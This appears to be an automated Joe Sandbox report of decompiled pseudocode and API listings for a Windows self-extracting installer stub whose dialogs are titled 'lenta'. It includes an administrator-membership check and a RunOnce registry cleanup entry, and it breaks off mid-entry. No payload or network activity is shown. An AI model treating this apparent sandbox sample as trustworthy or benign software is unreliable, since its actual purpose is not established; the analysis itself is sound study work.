                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                        • API String ID: 3027380567-4285006626
                                                                        • Opcode ID: 9b14ef8ac92588a4f00c8dbf0c8f4ef6a429239637c9bdd2f17ae19ab98a7b00
                                                                        • Instruction ID: 83c1af30d6a5c2cb843efcff5dd9204c4a4680f7c91563ab263c0e7a4f685369
                                                                        • Opcode Fuzzy Hash: 9b14ef8ac92588a4f00c8dbf0c8f4ef6a429239637c9bdd2f17ae19ab98a7b00
                                                                        • Instruction Fuzzy Hash: C1319876A012186BDB239B65FC49FDB777CEF55700F0001A7F50DAA151EA71AB88CA50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E003D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0x3d8590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0x3d8590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E003D43D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0x3d8d4c);
                                                                        					SetWindowTextA(_t33, "lenta");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0x3d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E003D30C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}









                                                                        0x003d3108
                                                                        0x003d310b
                                                                        0x003d31b7
                                                                        0x003d31ca
                                                                        0x003d31d0
                                                                        0x003d31d0
                                                                        0x003d31da
                                                                        0x00000000
                                                                        0x003d31da
                                                                        0x003d3111
                                                                        0x003d3114
                                                                        0x003d3136
                                                                        0x003d3136
                                                                        0x003d3138
                                                                        0x003d313b
                                                                        0x003d3141
                                                                        0x00000000
                                                                        0x003d3143
                                                                        0x003d3116
                                                                        0x003d311b
                                                                        0x003d314b
                                                                        0x003d3151
                                                                        0x003d3158
                                                                        0x003d316a
                                                                        0x003d3176
                                                                        0x003d317d
                                                                        0x003d318b
                                                                        0x003d319e
                                                                        0x003d31a3
                                                                        0x00000000
                                                                        0x003d31ad
                                                                        0x003d3120
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d312a
                                                                        0x003d3134
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3134
                                                                        0x003d312c
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 003D313B
                                                                        • GetDesktopWindow.USER32 ref: 003D314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 003D316A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D3176
                                                                        • SetForegroundWindow.USER32(?), ref: 003D317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 003D3185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 003D3190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,003D30C0), ref: 003D31A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003D31CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: lenta
                                                                        • API String ID: 3785188418-2780258678
                                                                        • Opcode ID: 72f90f1262209429effed696e305278e237a3a5d273de5a3c11e62ef86189445
                                                                        • Instruction ID: 602741374be8dd2d502d6d4967a5e4bcc332bcf3b249de99c48a51c64e007e55
                                                                        • Opcode Fuzzy Hash: 72f90f1262209429effed696e305278e237a3a5d273de5a3c11e62ef86189445
                                                                        • Instruction Fuzzy Hash: AE11B132646612BBDB136F24BD0CBAA3B6CFB4A720F110613F815922E0DB709A41D747
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E003D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}








                                                                        0x003d4699
                                                                        0x003d469b
                                                                        0x003d46a9
                                                                        0x003d46af
                                                                        0x003d46b4
                                                                        0x003d46bc
                                                                        0x003d46f9
                                                                        0x00000000
                                                                        0x003d46f9
                                                                        0x003d46d9
                                                                        0x003d46dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d46e5
                                                                        0x003d46ef
                                                                        0x00000000
                                                                        0x003d46f5
                                                                        0x003d46ff

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                        • LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                        • memcpy_s.MSVCRT ref: 003D46E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$lenta
                                                                        • API String ID: 3370778649-2035842925
                                                                        • Opcode ID: 8ed8b123df45e6570c7de8c01fb469e3253d0aecb27ebe4da203e1cf4d59f55d
                                                                        • Instruction ID: fda3b40d92f154f0f8667337101296eea2a1b30a4ffe8d92b641a2f0907da3e2
                                                                        • Opcode Fuzzy Hash: 8ed8b123df45e6570c7de8c01fb469e3253d0aecb27ebe4da203e1cf4d59f55d
                                                                        • Instruction Fuzzy Hash: C501D1332417007BE3221BA57D0DF2B3F2CDBCAB62F054016FB4A86280C9B1C84082A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0x3d81d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0x3d81d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0x3d81d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0x3d1140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E003D66F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0x3d81d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t18 =  &_v8; // 0x3d463b
                                                                        				return E003D6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                        			}


















                                                                        0x003d681f
                                                                        0x003d682a
                                                                        0x003d6831
                                                                        0x003d6836
                                                                        0x003d683c
                                                                        0x003d683e
                                                                        0x003d6848
                                                                        0x003d6851
                                                                        0x003d685d
                                                                        0x003d6864
                                                                        0x003d6876
                                                                        0x003d693a
                                                                        0x003d693a
                                                                        0x003d687c
                                                                        0x003d687e
                                                                        0x003d6885
                                                                        0x00000000
                                                                        0x003d68d6
                                                                        0x003d68f4
                                                                        0x003d6900
                                                                        0x003d6902
                                                                        0x003d690a
                                                                        0x00000000
                                                                        0x003d690c
                                                                        0x003d690c
                                                                        0x003d691c
                                                                        0x00000000
                                                                        0x003d691e
                                                                        0x003d6924
                                                                        0x003d692b
                                                                        0x003d6932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d692b
                                                                        0x003d691c
                                                                        0x003d690a
                                                                        0x003d6885
                                                                        0x003d6876
                                                                        0x003d6940
                                                                        0x003d6951

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003D686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 003D68A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003D68CC
                                                                        • RegQueryValueExA.ADVAPI32(?,003D1140,00000000,?,?,0000000C), ref: 003D68F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 003D6902
                                                                          • Part of subcall function 003D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,003D691A), ref: 003D6741
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: ;F=$Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-732160682
                                                                        • Opcode ID: 06bbe1e9543a200f140d281451b13e1c201f19a105ab37da6c6e74971f229c56
                                                                        • Instruction ID: dcdfb2736b77f19165dc6234a1fe5538e713b998c4bae44e9d68f681b56fe53e
                                                                        • Opcode Fuzzy Hash: 06bbe1e9543a200f140d281451b13e1c201f19a105ab37da6c6e74971f229c56
                                                                        • Instruction Fuzzy Hash: 11318432E012189FDB33DB51EC16BAA777CEB85718F0501A7E959A6240DB309D89CF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E003D17EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0x3da288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E003D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}



















                                                                        0x003d17f6
                                                                        0x003d17fd
                                                                        0x003d1805
                                                                        0x003d180b
                                                                        0x003d180d
                                                                        0x003d1815
                                                                        0x003d1818
                                                                        0x003d1820
                                                                        0x003d1824
                                                                        0x003d182c
                                                                        0x003d1832
                                                                        0x003d1837
                                                                        0x003d1851
                                                                        0x003d1854
                                                                        0x003d185d
                                                                        0x003d1862
                                                                        0x003d186c
                                                                        0x003d1872
                                                                        0x003d1877
                                                                        0x003d187e
                                                                        0x003d187e
                                                                        0x003d1883
                                                                        0x003d1883
                                                                        0x003d185d
                                                                        0x003d188a
                                                                        0x003d188a
                                                                        0x003d18a2

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003D18DD), ref: 003D181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003D182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(003D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003D18DD), ref: 003D1855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,003D18DD), ref: 003D1883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,003D18DD), ref: 003D188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: d9d8053cec7495492b3f954213b751863ad649e8971f65d91951b176ff16dcf0
                                                                        • Instruction ID: 5c5f1560be59a3623b4e559943058e98f10dd8f5339997bbba493f7a98f33a42
                                                                        • Opcode Fuzzy Hash: d9d8053cec7495492b3f954213b751863ad649e8971f65d91951b176ff16dcf0
                                                                        • Instruction Fuzzy Hash: 25118172E01209BBDB129FA4FD49ABEBB78EF44701F10016BF901E3390DA709D048B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E003D43D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "lenta");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0x3d9404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0x3d91dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}








                                                                        0x003d3459
                                                                        0x003d345c
                                                                        0x003d34d8
                                                                        0x003d34de
                                                                        0x00000000
                                                                        0x003d34e0
                                                                        0x003d345e
                                                                        0x003d3463
                                                                        0x003d349a
                                                                        0x003d34a0
                                                                        0x003d34a7
                                                                        0x003d34b2
                                                                        0x003d34c4
                                                                        0x003d34cb
                                                                        0x00000000
                                                                        0x003d34cb
                                                                        0x003d3468
                                                                        0x003d346e
                                                                        0x003d3474
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d347c
                                                                        0x003d348c
                                                                        0x003d3490
                                                                        0x00000000
                                                                        0x003d3496
                                                                        0x003d3484
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3486
                                                                        0x00000000
                                                                        0x003d3486
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 003D3490
                                                                        • GetDesktopWindow.USER32 ref: 003D349A
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D34B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 003D34C4
                                                                        • SetForegroundWindow.USER32(?), ref: 003D34CB
                                                                        • EndDialog.USER32(?,00000002), ref: 003D34D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: lenta
                                                                        • API String ID: 852535152-2780258678
                                                                        • Opcode ID: 3c1054a44f5724e468e160a5916be8690b0da071b6cb3ee6a2fe70a50b6600f7
                                                                        • Instruction ID: 9062f34d9b0286da2d915e401f777df46fa550caaf92e3077b2ae7df6201d693
                                                                        • Opcode Fuzzy Hash: 3c1054a44f5724e468e160a5916be8690b0da071b6cb3ee6a2fe70a50b6600f7
                                                                        • Instruction Fuzzy Hash: 6F01D433242525ABC7175F6AFD0C9AE3B78EB05700F024013F94696BA0CB388F51CB82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E003D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0x3d9a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E003D1680(_t65, E003D17C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E003D65E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E003D1680(_t65, E003D17C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E003D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}






















                                                                        0x003d2aac
                                                                        0x003d2ab7
                                                                        0x003d2abc
                                                                        0x003d2abe
                                                                        0x003d2ac3
                                                                        0x003d2ac6
                                                                        0x003d2ac9
                                                                        0x003d2ace
                                                                        0x003d2ae6
                                                                        0x003d2bdc
                                                                        0x003d2bdc
                                                                        0x003d2be0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2af2
                                                                        0x003d2afc
                                                                        0x003d2b00
                                                                        0x003d2b05
                                                                        0x003d2b05
                                                                        0x003d2b0b
                                                                        0x003d2bca
                                                                        0x003d2bd1
                                                                        0x003d2b11
                                                                        0x003d2b18
                                                                        0x003d2b26
                                                                        0x003d2b99
                                                                        0x003d2bc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2b9b
                                                                        0x003d2bae
                                                                        0x003d2bb3
                                                                        0x003d2bb5
                                                                        0x003d2bb5
                                                                        0x003d2bb8
                                                                        0x003d2bb8
                                                                        0x003d2bba
                                                                        0x003d2bbb
                                                                        0x00000000
                                                                        0x003d2bb8
                                                                        0x003d2b28
                                                                        0x003d2b2e
                                                                        0x003d2b33
                                                                        0x003d2b39
                                                                        0x003d2b3c
                                                                        0x003d2b3c
                                                                        0x003d2b3e
                                                                        0x003d2b3f
                                                                        0x003d2b55
                                                                        0x003d2b5d
                                                                        0x003d2b64
                                                                        0x003d2b64
                                                                        0x003d2b7a
                                                                        0x003d2b7f
                                                                        0x003d2b81
                                                                        0x003d2b81
                                                                        0x003d2b84
                                                                        0x003d2b84
                                                                        0x003d2b86
                                                                        0x003d2b87
                                                                        0x003d2bbf
                                                                        0x003d2bc1
                                                                        0x003d2bc1
                                                                        0x003d2b26
                                                                        0x003d2bda
                                                                        0x003d2bda
                                                                        0x003d2be6
                                                                        0x003d2be6
                                                                        0x003d2bf8

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 003D2AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 003D2AF2
                                                                        • CharNextA.USER32(?), ref: 003D2B12
                                                                        • CharUpperA.USER32 ref: 003D2B1E
                                                                        • CharPrevA.USER32(?,?), ref: 003D2B55
                                                                        • CharNextA.USER32(?), ref: 003D2BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: a36337f5254eae1c92dfaac5f6a39872bc11aa7d209859a0626e9b9709781cc4
